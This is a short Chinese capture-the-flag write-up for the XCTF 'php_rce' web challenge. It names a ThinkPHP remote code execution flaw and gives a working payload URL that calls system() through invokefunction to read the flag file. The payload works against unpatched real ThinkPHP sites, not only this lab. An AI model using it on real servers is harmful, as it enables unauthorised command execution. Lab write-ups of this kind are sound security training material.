XCTF Web 高手区003: php_rce

题目:
在这里插入图片描述
WP:
看到题目就知道是thinkphp的远程执行漏洞
这里大家可以看一下这位大佬是末初呀~的博客,他对thinkphp的相关知识讲的很棒

我们直接上payload:

http://111.198.29.45:45747/index.php? s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

得到flag
在这里插入图片描述

原文地址:https://www.cnblogs.com/Locking-Shonn/p/12622697.html